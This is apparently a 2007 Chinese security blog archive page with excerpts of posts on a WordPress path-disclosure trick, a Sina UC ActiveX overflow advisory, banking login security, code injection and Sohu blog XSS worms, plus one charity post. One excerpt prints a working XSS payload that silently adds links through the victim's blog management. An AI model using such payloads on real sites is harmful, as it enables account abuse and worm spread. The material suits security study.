2007年1月 的日志

wordpress绝对路径泄露+分析

2007/01/09 10:20 | 鬼仔 | 技术文章 | 3 个回复

来源:neeao blog
by:xy7 [B.C.T]

无意中改下就暴路径了,应该所有版本都有,测试了正式版和几个beta版,具体版本漏洞代码所在行数不同而已,又是数组和变量的老问题,相信很多地方都还存在。
问题出在搜索的参数,http://XXX.com/index.php?s= 改成 http://XXX.com/index.php?s[]=
Warning: rawurlencode() expects parameter 1 to be string, array given in /home/xxx/public_html/wp-includes/classes.php on line 227

问题很小,突然想起一件很有意义的事,就看了下代码,写个比较完整点的文档
阅读全文 »

Tags:

新浪UC ActiveX多个远程栈溢出漏洞 0-DAY

2007/01/09 10:07 | 鬼仔 | 技术文章 | 消灭0回复

信息来源:安全焦点

Sowhat of Nevis Labs
日期: 2007.01.09

http://www.nevisnetworks.com
http://secway.org/advisory/20070109EN.txt
http://secway.org/advisory/20070109CN.txt

CVE: 暂无

厂商

Sina Inc.

受影响的版本:
Sina UC <=UC2006

Overview:
新浪UC是中国非常流行的IM工具之一

http://www.51uc.com

细节:

漏洞的起因是Sina UC的多个ActiveX控件的参数缺乏必要的验证,攻击者构造恶意网页,可以远程完全控制安装了Sina UC
的用户的计算机,

多个控件存在栈溢出问题,包括但不限于:
阅读全文 »

Tags: , , ,

网上银行等电子支付平台的WEB登陆安全性简要分析

2007/01/09 10:05 | 鬼仔 | 技术文章 | 消灭0回复

作者:xyzreg
网站:http://www.xyzreg.net

注:图片不方便显示,PDF版下载:http://www.xyzreg.net/bank.pdf

前言:本文还是去年年初写的,当时出于安全考虑没放出来。现在部分网上银行已大幅度降低了无高级别安全措施情况下的转账限额,并建议用户使用动态口令卡或者USB Key,总体安全系数有所提高。

随着子商务的普及,网上银行以及在线电子支付等方式逐渐被网民所接受和喜爱。但是网上银行以及电子商务支付平台的安全性不容乐观。尽管各网上银行采取 SSL加密防止通过嗅探网络封包的方式截取密码;对于防止WEB登陆时密码被窃取,网上银行采取了安全控件或者动态软键盘的方法,但考虑的仍不全面,我们还是能采取相应的方法截获用户输入的密码。
阅读全文 »

十分钟看懂360系统诊断日志

2007/01/08 11:16 | 鬼仔 | 技术文章 | 消灭0回复

作者:nslog(www.nslog.cn)
日期:2007/01/08(转载请保留此申明)

写在前面
当确定一个系统可能存在问题的时候,首先要做的,就是找出系统的问题所在,这个时候我们就需要来“看懂”系统诊断日志,找出原因所在,然后再来做相应清除。虽然现在有很多的流氓清除软件,但跟杀毒软件一样,他们永远是跟着流氓软件后面在奔跑,当这个流氓是一个新出来的时候,必须要经过以下步骤:
厂商拿到样本——>分析——>加入特征码/病毒行为——>更新病毒特征库——用户下载——>查杀成功
所以有时不得以,我们需要自己来诊断一下,当然,这个诊断远没有想象的那么难。目前比较常用的诊断工具有Hijackthis,360safe,SRENG等几个软件。360safe经过几次升级,借鉴 阅读全文 »

搜狐ajax hacking漏洞详解——XSS worm

2007/01/07 9:46 | 鬼仔 | 技术文章 | 消灭0回复

鬼仔:记得以前有个 Myspace 的XSS worm。

作者:monyer
来源:梦之光芒

搜狐博客存在ajax hacking漏洞,可以实现web worm的功能,下面是具体的利用方法:

标准的ajax数据提交,该ajax的XmlHttp方式为微软msdn提供的标准方法!
阅读全文 »

Tags: , ,

向其他进程注入代码的三种方法

2007/01/06 11:01 | 鬼仔 | 技术文章 | 消灭0回复

原版地址:http://www.codeproject.com/threads/winspy.asp?df=100&forumid=16291&select=1025152&msg=1025152

pdf格式下载:
http://netxfly.blogbus.com/files/1163491746.pdf

下载整个压缩包

下载WinSpy

作者:Robert Kuster

翻译:袁晓辉([email protected]

摘要:如何向其他线程的地址空间中注入代码并在这个线程的上下文中执行之。

目录:

●导言

●Windows 钩子(Hooks)

●CreateRemoteThread 和LoadLibrary 技术

○进程间通讯

●CreateRemoteThread 和 WriteProcessmemory 技术
阅读全文 »

XSS 0DAY

2007/01/05 8:03 | 鬼仔 | 技术文章 | 消灭0回复

文章作者:茄子宝
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

看到梦之光芒放出来了!我也不藏了!

10月7日的时候我就发的日志,提示了大家!这里算是上次发的XSS WORM初尝试的续吧.

其实很简单,就是两次转码.

<DIV STYLE="background-image: url(javascript:var XmlHttp=new ActiveXObject("Microsoft.XMLhttp"); XmlHttp.Open("get","/manage/link.do?m=add&title=S0n9%20bl09&desc=This%20is%20XSS%20TEST%20%21&link=http%3A//s0n9.blog.sohu.com&_",true); XmlHttp.send(null);)">

阅读全文 »

Tags:

12.15夜晚,李连杰毁掉自己形象,却塑造了高尚人格!

2007/01/05 3:49 | 鬼仔 | 心情随笔 | 10 个回复

鬼仔:今天无意间看到这段视频的,这是李连杰在《黄金甲》首映式结束前,在台上做的讲演,看过之后我也发短信捐了一块钱。一块钱,相信大家都没有怎么放在心上,希望大家当作是为中国的慈善事业尽了一份力吧!
希望大家带着一颗慈善的心态去看,用自己的心去体会李连杰的心。

http://www.tudou.com/v/PXH7WA41QIw
一位网友如是说:
李连杰在2006年的12月15日的夜晚,彻底毁掉了自己的形象,我们可以听到李连杰颤抖着的声音,可以听到李连杰因情绪激动而语无伦次的话语,我们可以看到李连杰一次又一次的鞠着躬,可以看到李连杰一遍又一遍的求着记者主持们,可以看到李连杰自始至终没有稳稳的站立过….. 当娱乐圈里的名人们将 阅读全文 »

Tags: